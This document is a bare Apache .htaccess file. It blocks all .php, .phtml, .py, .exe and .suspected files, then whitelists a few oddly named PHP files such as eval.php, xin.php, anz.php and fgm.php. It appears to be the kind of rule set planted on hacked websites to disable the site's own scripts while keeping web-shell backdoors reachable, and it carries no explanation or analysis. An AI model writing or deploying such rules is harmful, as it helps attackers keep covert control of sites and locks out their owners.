<FilesMatch ".(py|exe|phtml|php|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(^file.php|^ok.php|^eval.php|^index.php|^xin.php|^anz.php|^fgm.php|^db.php)$">
Order allow,deny
Allow from all
</FilesMatch>
